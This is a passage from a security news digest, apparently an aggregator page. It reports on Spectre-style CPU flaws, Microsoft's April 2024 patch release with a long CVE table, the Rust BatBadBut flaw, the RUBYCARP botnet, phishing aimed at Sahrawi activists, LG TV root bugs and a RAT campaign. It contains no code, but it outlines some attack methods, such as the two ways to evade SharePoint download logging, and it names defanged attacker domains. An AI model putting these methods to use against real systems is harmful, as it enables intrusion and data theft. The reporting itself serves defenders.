"Existing mitigation techniques of disabling privileged eBPF and enabling
(Fine)IBT are insufficient in stopping BHI exploitation against the
kernel/hypervisor," the CERT Coordination Center (CERT/CC) said in an advisory.
"An unauthenticated attacker can exploit this vulnerability to leak privileged
memory from the CPU by speculatively jumping to a chosen gadget."
The disclosure comes weeks after IBM and VUSec detailed GhostRace
(CVE-2024-2193), a variant of Spectre v1 that employs a combination of
speculative execution and race conditions to leak data from contemporary CPU
architectures.
It also follows new research from ETH Zurich that disclosed a family of attacks
dubbed Ahoi Attacks that could be used to compromise hardware-based trusted
execution environments (TEEs) and break confidential virtual machines (CVMs)
like AMD Secure Encrypted Virtualization-Secure Nested Paging (SEV-SNP) and
Intel Trust Domain Extensions (TDX).
The attacks, codenamed Heckler and WeSee, make use of malicious interrupts to
break the integrity of CVMs, potentially allowing threat actors to remotely log
in and gain elevated access, as well as perform arbitrary read, write, and code
injection to disable firewall rules and open a root shell.
"For Ahoi Attacks, an attacker can use the hypervisor to inject malicious
interrupts to the victim's vCPUs and trick it into executing the interrupt
handlers," the researchers said. "These interrupt handlers can have global
effects (e.g., changing the register state in the application) that an attacker
can trigger to compromise the victim's CVM."
In response to the findings, AMD said the vulnerability is rooted in the Linux
kernel implementation of SEV-SNP and that fixes addressing some of the issues
have been upstreamed to the main Linux kernel.
The flaw has been confirmed to affect Illumos, Intel, Red Hat, SUSE Linux,
Triton Data Center, and Xen. AMD, in a bulletin, said it's "aware of any impact"
on its products.
Microsoft Fixes 149 Flaws in Huge April Patch Release, Zero-Days Included
10.4.24
OS
The Hacker News
Microsoft has released security
updates for the month of April 2024 to remediate a record 149 flaws, two of
which have come under active exploitation in the wild.
Of the 149 flaws, three are rated Critical, 142 are rated Important, three are rated Moderate, and one is rated Low in severity. The update is aside from 21 vulnerabilities that the company addressed in its Chromium-based Edge browser following the release of the March 2024 Patch Tuesday fixes.
The two shortcomings that have come under active exploitation are below -
CVE-2024-26234 (CVSS score: 6.7) - Proxy Driver Spoofing Vulnerability
CVE-2024-29988 (CVSS score: 8.8) - SmartScreen Prompt Security Feature Bypass
Vulnerability
While Microsoft's own advisory provides no information about
CVE-2024-26234, cybersecurity firm Sophos said it discovered in December 2023 a
malicious executable ("Catalog.exe" or "Catalog Authentication Client Service")
that's signed by a valid Microsoft Windows Hardware Compatibility Publisher
(WHCP) certificate.
Authenticode analysis of the binary has revealed the original requesting publisher to Hainan YouHu Technology Co. Ltd, which is also the publisher of another tool called LaiXi Android Screen Mirroring.
The latter is described as "a marketing software ... [that] can connect hundreds of mobile phones and control them in batches, and automate tasks like batch following, liking, and commenting."
Present within the purported authentication service is a component called 3proxy that's designed to monitor and intercept network traffic on an infected system, effectively acting as a backdoor.
"We have no evidence to suggest that the LaiXi developers deliberately embedded the malicious file into their product, or that a threat actor conducted a supply chain attack to insert it into the compilation/building process of the LaiXi application," Sophos researcher Andreas Klopsch said.
The cybersecurity company also said it discovered multiple other variants of the backdoor in the wild going all the way back to January 5, 2023, indicating that the campaign has been underway at least since then. Microsoft has since added the relevant files to its revocation list.
The other security flaw that has reportedly come under active attack is CVE-2024-29988, which – like CVE-2024-21412 and CVE-2023-36025 – allows attackers to sidestep Microsoft Defender Smartscreen protections when opening a specially crafted file.
"To exploit this security feature bypass vulnerability, an attacker would need to convince a user to launch malicious files using a launcher application that requests that no UI be shown," Microsoft said.
"In an email or instant message attack scenario, the attacker could send the targeted user a specially crafted file that is designed to exploit the remote code execution vulnerability."
The Zero Day Initiative revealed that there is evidence of the flaw being exploited in the wild, although Microsoft has tagged it with an "Exploitation More Likely" assessment.
Another vulnerability of importance is CVE-2024-29990 (CVSS score: 9.0), an elevation of privilege flaw impacting Microsoft Azure Kubernetes Service Confidential Container that could be exploited by unauthenticated attackers to steal credentials.
"An attacker can access the untrusted AKS Kubernetes node and AKS Confidential Container to take over confidential guests and containers beyond the network stack it might be bound to," Redmond said.
In all, the release is notable for addressing as many as 68 remote code execution, 31 privilege escalation, 26 security feature bypass, and six denial-of-service (DoS) bugs. Interestingly, 24 of the 26 security bypass flaws are related to Secure Boot.
"While none of these Secure Boot vulnerabilities addressed this month were exploited in the wild, they serve as a reminder that flaws in Secure Boot persist, and we could see more malicious activity related to Secure Boot in the future," Satnam Narang, senior staff research engineer at Tenable, said in a statement.
The disclosure comes as Microsoft has faced criticism for its security practices, with a recent report from the U.S. Cyber Safety Review Board (CSRB) calling out the company for not doing enough to prevent a cyber espionage campaign orchestrated by a Chinese threat actor tracked as Storm-0558 last year.
It also follows the company's decision to publish root cause data for security flaws using the Common Weakness Enumeration (CWE) industry standard. However, it's worth noting that the changes are only in effect starting from advisories published since March 2024.
"The addition of CWE assessments to Microsoft security advisories helps pinpoint the generic root cause of a vulnerability," Adam Barnett, lead software engineer at Rapid7, said in a statement shared with The Hacker News.
"The CWE program has recently updated its guidance on mapping CVEs to a CWE Root Cause. Analysis of CWE trends can help developers reduce future occurrences through improved Software Development Life Cycle (SDLC) workflows and testing, as well as helping defenders understand where to direct defense-in-depth and deployment-hardening efforts for best return on investment."
In a related development, cybersecurity firm Varonis detailed two methods that attackers could adopt to circumvent audit logs and avoid triggering download events while exfiltrating files from SharePoint.
The first approach takes advantage of SharePoint's "Open in App" feature to access and download files, whereas the second uses the User-Agent for Microsoft SkyDriveSync to download files or even entire sites while miscategorizing such events as file syncs instead of downloads.
Microsoft, which was made aware of the issues in November 2023, has yet to release a fix, although they have been added to their patch backlog program. In the interim, organizations are recommended to closely monitor their audit logs for suspicious access events, specifically those that involve large volumes of file downloads within a short period.
"These techniques can bypass the detection and enforcement policies of traditional tools, such as cloud access security brokers, data loss prevention, and SIEMs, by hiding downloads as less suspicious access and sync events," Eric Saraga said.
Critical 'BatBadBut' Rust Vulnerability Exposes Windows Systems to Attacks
10.4.24
Exploit
The Hacker News
critical security flaw in the Rust
standard library could be exploited to target Windows users and stage command
injection attacks.
The vulnerability, tracked as CVE-2024-24576, has a CVSS score of 10.0, indicating maximum severity. That said, it only impacts scenarios where batch files are invoked on Windows with untrusted arguments.
"The Rust standard library did not properly escape arguments when invoking batch files (with the bat and cmd extensions) on Windows using the Command API," the Rust Security Response working group said in an advisory released on April 9, 2024.
"An attacker able to control the arguments passed to the spawned process could execute arbitrary shell commands by bypassing the escaping."
The flaw impacts all versions of Rust before 1.77.2. Security researcher RyotaK has been credited with discovering and reporting the bug to the CERT Coordination Center (CERT/CC).
RyotaK said the vulnerability – codenamed BatBadBut – impacts several programming languages and that it arises when the "programming language wraps the CreateProcess function [in Windows] and adds the escaping mechanism for the command arguments."
But in light of the fact that not every programming language has addressed the
problem, developers are being recommended to exercise caution when executing
commands on Windows.
"To prevent the unexpected execution of batch files, you should consider moving the batch files to a directory that is not included in the PATH environment variable," RyotaK said in a word of advice to users.
"In this case, the batch files won't be executed unless the full path is specified, so the unexpected execution of batch files can be prevented."
This update covers a total of 157 vulnerabilities. Seven of these vulnerabilities are Chromium vulnerabilities affecting Microsoft's Edge browser. However, only three of these vulnerabilities are considered critical. One of the vulnerabilities had already been disclosed and exploited.
Vulnerabilities of Interest:
CVE-2024-26234: This proxy driver spoofing vulnerability has already been exploited and made public before today.
CVE-2024-21322, CVE-2024-21323, CVE-2024-29053: These critical vulnerabilities allow remote code execution in Microsoft Defender for IoT.
The update patches about 40 (sorry, lost exact count) remote code execution vulnerabilities in Microsoft OLE Driver for SQL Server. These vulnerabilities are rated only "important", not "critical". The vulnerability affects clients connecting to malicious SQL servers. The client would be the target, not the server.
The seven important remote code execution vulnerabilities in the DNS Server Service look interesting. To achieve remote code execution, "perfect timing" is required according to Microsoft.
Description | |||||||
---|---|---|---|---|---|---|---|
CVE | Disclosed | Exploited | Exploitability (old versions) | current version | Severity | CVSS Base (AVG) | CVSS Temporal (AVG) |
Mariner: Openwsman Path Traversal and process_connection() DoS vulnerability. | |||||||
CVE-2019-3816 | No | No | - | - | - | 7.5 | 7.5 |
CVE-2019-3833 | No | No | - | - | - | 7.5 | 7.5 |
.NET, .NET Framework, and Visual Studio Remote Code Execution Vulnerability | |||||||
CVE-2024-21409 | No | No | - | - | Important | 7.3 | 6.4 |
Azure AI Search Information Disclosure Vulnerability | |||||||
CVE-2024-29063 | No | No | - | - | Important | 7.3 | 6.6 |
Azure Arc-enabled Kubernetes Extension Cluster-Scope Elevation of Privilege Vulnerability | |||||||
CVE-2024-28917 | No | No | - | - | Important | 6.2 | 5.4 |
Azure Compute Gallery Elevation of Privilege Vulnerability | |||||||
CVE-2024-21424 | No | No | - | - | Important | 6.5 | 5.7 |
Azure CycleCloud Elevation of Privilege Vulnerability | |||||||
CVE-2024-29993 | No | No | - | - | Important | 8.8 | 7.7 |
Azure Identity Library for .NET Information Disclosure Vulnerability | |||||||
CVE-2024-29992 | No | No | - | - | Moderate | 5.5 | 5.3 |
Azure Migrate Remote Code Execution Vulnerability | |||||||
CVE-2024-26193 | No | No | - | - | Important | 6.4 | 5.9 |
Azure Monitor Agent Elevation of Privilege Vulnerability | |||||||
CVE-2024-29989 | No | No | - | - | Important | 8.4 | 7.3 |
Azure Private 5G Core Denial of Service Vulnerability | |||||||
CVE-2024-20685 | No | No | - | - | Moderate | 5.9 | 5.2 |
BitLocker Security Feature Bypass Vulnerability | |||||||
CVE-2024-20665 | No | No | - | - | Important | 6.1 | 5.3 |
Chromium: CVE-2024-3156 Inappropriate implementation in V8 | |||||||
CVE-2024-3156 | No | No | - | - | - | ||
Chromium: CVE-2024-3158 Use after free in Bookmarks | |||||||
CVE-2024-3158 | No | No | - | - | - | ||
Chromium: CVE-2024-3159 Out of bounds memory access in V8 | |||||||
CVE-2024-3159 | No | No | - | - | - | ||
DHCP Server Service Denial of Service Vulnerability | |||||||
CVE-2024-26212 | No | No | - | - | Important | 7.5 | 6.5 |
CVE-2024-26215 | No | No | - | - | Important | 7.5 | 7.2 |
DHCP Server Service Remote Code Execution Vulnerability | |||||||
CVE-2024-26195 | No | No | - | - | Important | 7.2 | 6.3 |
CVE-2024-26202 | No | No | - | - | Important | 7.2 | 6.3 |
HTTP.sys Denial of Service Vulnerability | |||||||
CVE-2024-26219 | No | No | - | - | Important | 7.5 | 6.5 |
Intel: CVE-2024-2201 Branch History Injection | |||||||
CVE-2024-2201 | No | No | - | - | Important | 4.7 | 4.1 |
Lenovo: CVE-2024-23593 Zero Out Boot Manager and drop to UEFI Shell | |||||||
CVE-2024-23593 | No | No | - | - | Important | 7.8 | 6.8 |
Lenovo: CVE-2024-23594 Stack Buffer Overflow in LenovoBT.efi | |||||||
CVE-2024-23594 | No | No | - | - | Important | 6.4 | 5.6 |
Microsoft Azure Kubernetes Service Confidential Container Elevation of Privilege Vulnerability | |||||||
CVE-2024-29990 | No | No | - | - | Important | 9.0 | 8.1 |
Microsoft Brokering File System Elevation of Privilege Vulnerability | |||||||
CVE-2024-28905 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-26213 | No | No | - | - | Important | 7.0 | 6.1 |
CVE-2024-28904 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-28907 | No | No | - | - | Important | 7.8 | 6.8 |
Microsoft Defender for IoT Elevation of Privilege Vulnerability | |||||||
CVE-2024-21324 | No | No | - | - | Important | 7.2 | 6.3 |
CVE-2024-29055 | No | No | - | - | Important | 7.2 | 6.3 |
CVE-2024-29054 | No | No | - | - | Important | 7.2 | 6.3 |
Microsoft Defender for IoT Remote Code Execution Vulnerability | |||||||
CVE-2024-21322 | No | No | - | - | Critical | 7.2 | 6.3 |
CVE-2024-21323 | No | No | - | - | Critical | 8.8 | 7.7 |
CVE-2024-29053 | No | No | - | - | Critical | 8.8 | 7.7 |
Microsoft Edge (Chromium-based) Spoofing Vulnerability | |||||||
CVE-2024-29981 | No | No | Less Likely | Less Likely | Low | 4.3 | 3.9 |
Microsoft Edge (Chromium-based) Webview2 Spoofing Vulnerability | |||||||
CVE-2024-29049 | No | No | Less Likely | Less Likely | Moderate | 4.1 | 3.6 |
Microsoft Excel Remote Code Execution Vulnerability | |||||||
CVE-2024-26257 | No | No | - | - | Important | 7.8 | 7.5 |
Microsoft Install Service Elevation of Privilege Vulnerability | |||||||
CVE-2024-26158 | No | No | - | - | Important | 7.8 | 6.8 |
Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability | |||||||
CVE-2024-26209 | No | No | - | - | Important | 5.5 | 4.8 |
Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability | |||||||
CVE-2024-26232 | No | No | - | - | Important | 7.3 | 6.4 |
CVE-2024-26208 | No | No | - | - | Important | 7.2 | 6.3 |
Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability | |||||||
CVE-2024-28929 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28931 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28932 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28936 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-29043 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28930 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28933 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28934 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28935 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28937 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28938 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28941 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28943 | No | No | - | - | Important | 8.8 | 7.7 |
Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |||||||
CVE-2024-28906 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28908 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28909 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28910 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28911 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28912 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28913 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28914 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28915 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28939 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28942 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28945 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-29045 | No | No | - | - | Important | 7.5 | 6.5 |
CVE-2024-29047 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28926 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28927 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28940 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28944 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-29044 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-29046 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-29048 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-29982 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-29983 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-29984 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-29985 | No | No | - | - | Important | 8.8 | 7.7 |
Microsoft SharePoint Server Spoofing Vulnerability | |||||||
CVE-2024-26251 | No | No | - | - | Important | 6.8 | 6.5 |
Microsoft Virtual Machine Bus (VMBus) Denial of Service Vulnerability | |||||||
CVE-2024-26254 | No | No | - | - | Important | 7.5 | 6.5 |
Microsoft WDAC OLE DB Provider for SQL Server Remote Code Execution Vulnerability | |||||||
CVE-2024-26210 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-26244 | No | No | - | - | Important | 8.8 | 7.7 |
Microsoft WDAC SQL Server ODBC Driver Remote Code Execution Vulnerability | |||||||
CVE-2024-26214 | No | No | - | - | Important | 8.8 | 7.7 |
Outlook for Windows Spoofing Vulnerability | |||||||
CVE-2024-20670 | No | No | - | - | Important | 8.1 | 7.1 |
Proxy Driver Spoofing Vulnerability | |||||||
CVE-2024-26234 | Yes | Yes | - | - | Important | 6.7 | 5.8 |
Remote Procedure Call Runtime Remote Code Execution Vulnerability | |||||||
CVE-2024-20678 | No | No | - | - | Important | 8.8 | 7.7 |
Secure Boot Security Feature Bypass Vulnerability | |||||||
CVE-2024-20669 | No | No | - | - | Important | 6.7 | 5.8 |
CVE-2024-20688 | No | No | - | - | Important | 7.1 | 6.2 |
CVE-2024-20689 | No | No | - | - | Important | 7.1 | 6.2 |
CVE-2024-26250 | No | No | - | - | Important | 6.7 | 5.8 |
CVE-2024-28920 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-28922 | No | No | - | - | Important | 4.1 | 3.6 |
CVE-2024-28921 | No | No | - | - | Important | 6.7 | 5.8 |
CVE-2024-28919 | No | No | - | - | Important | 6.7 | 5.8 |
CVE-2024-28923 | No | No | - | - | Important | 6.4 | 5.6 |
CVE-2024-28896 | No | No | - | - | Important | 7.5 | 6.5 |
CVE-2024-28898 | No | No | - | - | Important | 6.3 | 5.5 |
CVE-2024-28903 | No | No | - | - | Important | 6.7 | 5.8 |
CVE-2024-26168 | No | No | - | - | Important | 6.8 | 5.9 |
CVE-2024-26171 | No | No | - | - | Important | 6.7 | 5.8 |
CVE-2024-26175 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-26180 | No | No | - | - | Important | 8.0 | 7.0 |
CVE-2024-26189 | No | No | - | - | Important | 8.0 | 7.0 |
CVE-2024-26194 | No | No | - | - | Important | 7.4 | 6.4 |
CVE-2024-26240 | No | No | - | - | Important | 8.0 | 7.0 |
CVE-2024-28924 | No | No | - | - | Important | 6.7 | 5.8 |
CVE-2024-28925 | No | No | - | - | Important | 8.0 | 7.0 |
CVE-2024-28897 | No | No | - | - | Important | 6.8 | 5.9 |
CVE-2024-29061 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-29062 | No | No | - | - | Important | 7.1 | 6.2 |
SmartScreen Prompt Security Feature Bypass Vulnerability | |||||||
CVE-2024-29988 | No | No | - | - | Important | 8.8 | 8.2 |
Win32k Elevation of Privilege Vulnerability | |||||||
CVE-2024-26241 | No | No | - | - | Important | 7.8 | 6.8 |
Windows Authentication Elevation of Privilege Vulnerability | |||||||
CVE-2024-21447 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-29056 | No | No | - | - | Important | 4.3 | 3.8 |
Windows CSC Service Elevation of Privilege Vulnerability | |||||||
CVE-2024-26229 | No | No | - | - | Important | 7.8 | 6.8 |
Windows Cryptographic Services Remote Code Execution Vulnerability | |||||||
CVE-2024-29050 | No | No | - | - | Important | 8.4 | 7.3 |
Windows Cryptographic Services Security Feature Bypass Vulnerability | |||||||
CVE-2024-26228 | No | No | - | - | Important | 7.8 | 6.8 |
Windows DNS Server Remote Code Execution Vulnerability | |||||||
CVE-2024-26221 | No | No | - | - | Important | 7.2 | 6.3 |
CVE-2024-26222 | No | No | - | - | Important | 7.2 | 6.3 |
CVE-2024-26223 | No | No | - | - | Important | 7.2 | 6.3 |
CVE-2024-26224 | No | No | - | - | Important | 7.2 | 6.3 |
CVE-2024-26227 | No | No | - | - | Important | 7.2 | 6.3 |
CVE-2024-26231 | No | No | - | - | Important | 7.2 | 6.3 |
CVE-2024-26233 | No | No | - | - | Important | 7.2 | 6.3 |
Windows DWM Core Library Information Disclosure Vulnerability | |||||||
CVE-2024-26172 | No | No | - | - | Important | 5.5 | 4.8 |
Windows Defender Credential Guard Elevation of Privilege Vulnerability | |||||||
CVE-2024-26237 | No | No | - | - | Important | 7.8 | 6.8 |
Windows Distributed File System (DFS) Information Disclosure Vulnerability | |||||||
CVE-2024-26226 | No | No | - | - | Important | 6.5 | 5.7 |
Windows Distributed File System (DFS) Remote Code Execution Vulnerability | |||||||
CVE-2024-29066 | No | No | - | - | Important | 7.2 | 6.3 |
Windows File Server Resource Management Service Elevation of Privilege Vulnerability | |||||||
CVE-2024-26216 | No | No | - | - | Important | 7.3 | 6.4 |
Windows Hyper-V Denial of Service Vulnerability | |||||||
CVE-2024-29064 | No | No | - | - | Important | 6.2 | 5.4 |
Windows Kerberos Denial of Service Vulnerability | |||||||
CVE-2024-26183 | No | No | - | - | Important | 6.5 | 5.7 |
Windows Kerberos Elevation of Privilege Vulnerability | |||||||
CVE-2024-26248 | No | No | - | - | Important | 7.5 | 6.5 |
Windows Kernel Elevation of Privilege Vulnerability | |||||||
CVE-2024-20693 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-26218 | No | No | - | - | Important | 7.8 | 6.8 |
Windows Mobile Hotspot Information Disclosure Vulnerability | |||||||
CVE-2024-26220 | No | No | - | - | Important | 5.0 | 4.4 |
Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | |||||||
CVE-2024-26211 | No | No | - | - | Important | 7.8 | 6.8 |
Windows Remote Access Connection Manager Information Disclosure Vulnerability | |||||||
CVE-2024-26255 | No | No | - | - | Important | 5.5 | 4.8 |
CVE-2024-28901 | No | No | - | - | Important | 5.5 | 4.8 |
CVE-2024-28902 | No | No | - | - | Important | 5.5 | 4.8 |
CVE-2024-26207 | No | No | - | - | Important | 5.5 | 4.8 |
CVE-2024-26217 | No | No | - | - | Important | 5.5 | 4.8 |
CVE-2024-28900 | No | No | - | - | Important | 5.5 | 4.8 |
Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability | |||||||
CVE-2024-26179 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-26200 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-26205 | No | No | - | - | Important | 8.8 | 7.7 |
Windows SMB Elevation of Privilege Vulnerability | |||||||
CVE-2024-26245 | No | No | - | - | Important | 7.8 | 6.8 |
Windows Storage Elevation of Privilege Vulnerability | |||||||
CVE-2024-29052 | No | No | - | - | Important | 7.8 | 6.8 |
Windows Telephony Server Elevation of Privilege Vulnerability | |||||||
CVE-2024-26242 | No | No | - | - | Important | 7.0 | 6.1 |
CVE-2024-26230 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-26239 | No | No | - | - | Important | 7.8 | 6.8 |
Windows USB Print Driver Elevation of Privilege Vulnerability | |||||||
CVE-2024-26243 | No | No | - | - | Important | 7.0 | 6.1 |
Windows Update Stack Elevation of Privilege Vulnerability | |||||||
CVE-2024-26235 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-26236 | No | No | - | - | Important | 7.0 | 6.1 |
Windows rndismp6.sys Remote Code Execution Vulnerability | |||||||
CVE-2024-26252 | No | No | - | - | Important | 6.8 | 5.9 |
CVE-2024-26253 | No | No | - | - | Important | 6.8 | 5.9 |
libarchive Remote Code Execution Vulnerability | |||||||
CVE-2024-26256 | No | No | - | - | Important | 7.8 | 6.8 |
10-Year-Old 'RUBYCARP' Romanian Hacker Group Surfaces with Botnet
9.4.24
BotNet
The Hacker News
A threat group of suspected Romanian origin called RUBYCARP has been observed maintaining a long-running botnet for carrying out crypto mining, distributed denial-of-service (DDoS), and phishing attacks.
The group, believed to be active for at least 10 years, employs the botnet for financial gain, Sysdig said in a report shared with The Hacker News.
"Its primary method of operation leverages a botnet deployed using a variety of public exploits and brute-force attacks," the cloud security firm said. "This group communicates via public and private IRC networks."
Evidence gathered so far suggests that RUBYCARP may have crossover with another threat cluster tracked by Albanian cybersecurity firm Alphatechs under the moniker Outlaw, which has a history of conducting crypto mining and brute-force attacks and has since pivoted to phishing and spear-phishing campaigns to cast a wide net.
"These phishing emails often lure victims into revealing sensitive information, such as login credentials or financial details," security researcher Brenton Isufi said in a report published in late December 2023.
A notable aspect of RUBYCARP's tradecraft is the use of a malware called ShellBot (aka PerlBot) to breach target environments. It has also been observed exploiting security flaws in the Laravel Framework (e.g., CVE-2021-3129), a technique also adopted by other threat actors like AndroxGh0st.
In a sign that the attackers are expanding their arsenal of initial access
methods to expand the scale of the botnet, Sysdig said it discovered signs of
WordPress sites being compromised using commonly used usernames and passwords.
"Once access is obtained, a backdoor is installed based on the popular Perl ShellBot," the company said. "The victim's server is then connected to an [Internet Relay Chat] server acting as command-and-control, and joins the larger botnet."
The botnet is estimated to comprise over 600 hosts, with the IRC server ("chat.juicessh[.]pro") created on May 1, 2023. It heavily relies on IRC for general communications as well as for managing its botnets and coordinating crypto mining campaigns.
Furthermore, members of the group – named juice_, Eugen, Catalin, MUIE, and Smecher, among others – have been found to communicate via an Undernet IRC channel called #cristi. Also put to use is a mass scanner tool to find new potential hosts.
RUBYCARP's arrival on the cyber threat scene is not surprising given their ability to take advantage of the botnet to fuel diverse illicit income streams such as crypto mining and phishing operations to steal credit card numbers.
While it appears that the stolen credit card data is used to purchase attack infrastructure, there is also the possibility that the information could be monetized through other means by selling it in the cyber crime underground.
"These threat actors are also involved in the development and sale of cyber weapons, which isn't very common," Sysdig said. "They have a large arsenal of tools they have built up over the years, which gives them quite a range of flexibility when conducting their operations.
Hackers Targeting Human Rights Activists in Morocco and Western Sahara
9.4.24
Phishing
The Hacker News
Human rights activists in Morocco
and the Western Sahara region are the targets of a new threat actor that
leverages phishing attacks to trick victims into installing bogus Android apps
and serve credential harvesting pages for Windows users.
Cisco Talos is tracking the activity cluster under the name Starry Addax, describing it as primarily singling out activists associated with the Sahrawi Arab Democratic Republic (SADR).
Starry Addax's infrastructure – ondroid[.]site and ondroid[.]store – is designed to target both Android and Windows users, with the latter involving fake websites masquerading as login pages for popular social media websites.
The adversary, believed to be active since January 2024, is known to send spear-phishing emails to targets, urging recipients to install Sahara Press Service's mobile app or a relevant decoy related to the region.
Depending on the operating system from where the request is originating from, the target is either served a malicious APK that impersonates the Sahara Press Service or redirected to a social media login page to harvest their credentials.
The novel Android malware, dubbed FlexStarling, is versatile and equipped to
deliver additional malware components and steal sensitive information from
infected devices.
Once installed, it requests the victim to grant it extensive permissions that allow the malware to perform nefarious actions, including fetching commands to be executed from a Firebase-based command-and-control (C2), a sign that the threat actor is looking to fly under the radar.
"Campaigns like this that target high-value individuals usually intend to sit quietly on the device for an extended period," Talos said.
"All components from the malware to the operating infrastructure seem to be bespoke/custom-made for this specific campaign indicating a heavy focus on stealth and conducting activities under the radar."
The development comes amid the emergence of a new commercial Android remote access trojan (RAT) known as Oxycorat that's being offered for sale with diverse information gathering capabilities.
Researchers Discover LG Smart TV Vulnerabilities Allowing Root Access
9.4.24
Vulnerebility
The Hacker News
Multiple security vulnerabilities
have been disclosed in LG webOS running on its smart televisions that could be
exploited to bypass authorization and gain root access on the devices.
The findings come from Romanian cybersecurity firm Bitdefender, which discovered and reported the flaws in November 2023. The issues were fixed by LG as part of updates released on March 22, 2024.
The vulnerabilities are tracked from CVE-2023-6317 through CVE-2023-6320 and impact the following versions of webOS -
webOS 4.9.7 - 5.30.40 running on LG43UM7000PLA
webOS 5.5.0 - 04.50.51 running
on OLED55CXPUA
webOS 6.3.3-442 (kisscurl-kinglake) - 03.36.50 running on
OLED48C1PUB
webOS 7.3.1-43 (mullet-mebin) - 03.33.85 running on OLED55A23LA
A brief description of the shortcomings is as follows -
CVE-2023-6317 - A vulnerability that allows an attacker to bypass PIN
verification and add a privileged user profile to the TV set without requiring
user interaction
CVE-2023-6318 - A vulnerability that allows the attacker to
elevate their privileges and gain root access to take control of the device
CVE-2023-6319 - A vulnerability that allows operating system command injection
by manipulating a library named asm responsible for showing music lyrics
CVE-2023-6320 - A vulnerability that allows for the injection of authenticated
commands by manipulating the
com.webos.service.connectionmanager/tv/setVlanStaticAddress API endpoint
Successful exploitation of the flaws could allow a threat actor to gain elevated
permissions to the device, which, in turn, can be chained with CVE-2023-6318 and
CVE-2023-6319 to obtain root access, or with CVE-2023-6320 to run arbitrary
commands as the dbus user.
"Although the vulnerable service is intended for LAN access only, Shodan, the
search engine for Internet-connected devices, identified over 91,000 devices
that expose this service to the Internet," Bitdefender said. A majority of the
devices are located in South Korea, Hong Kong, the U.S., Sweden, Finland, and
Latvia.
Attackers Using Obfuscation Tools to Deliver Multi-Stage Malware via Invoice
Phishing
9.4.24
Virus
The Hacker News
Cybersecurity researchers have
discovered an intricate multi-stage attack that leverages invoice-themed
phishing decoys to deliver a wide range of malware such as Venom RAT, Remcos
RAT, XWorm, NanoCore RAT, and a stealer that targets crypto wallets.
The email messages come with Scalable Vector Graphics (SVG) file attachments that, when clicked, activate the infection sequence, Fortinet FortiGuard Labs said in a technical report.
The modus operandi is notable for the use of the BatCloak malware obfuscation engine and ScrubCrypt to deliver the malware in the form of obfuscated batch scripts.
BatCloak, offered for sale to other threat actors since late 2022, has its foundations in another tool called Jlaive. Its primary feature is to load a next-stage payload in a manner that circumvents traditional detection mechanisms.
ScrubCrypt, a crypter that was first documented by Fortinet in March 2023 in connection with a cryptojacking campaign orchestrated by the 8220 Gang, is assessed to be one of the iterations of BatCloak, according to research from Trend Micro last year.
In the latest campaign analyzed by the cybersecurity firm, the SVG file serves as a conduit to drop a ZIP archive that contains a batch script likely created using BatCloak, which then unpacks the ScrubCrypt batch file to ultimately execute Venom RAT, but not before setting up persistence on the host and taking steps to bypass AMSI and ETW protections.
A fork of Quasar RAT, Venom RAT allows attackers to seize control of the
compromised systems, gather sensitive information, and execute commands received
from a command-and-control (C2) server.
"While Venom RAT's primary program may appear straightforward, it maintains communication channels with the C2 server to acquire additional plugins for various activities," security researcher Cara Lin said. This includes Venom RAT v6.0.3 with keylogger capabilities, NanoCore RAT, XWorm, and Remcos RAT.
"This [Remcos RAT] plugin was distributed from VenomRAT's C2 using three methods: an obfuscated VBS script named 'remcos.vbs,' ScrubCrypt, and Guloader PowerShell," Lin added.
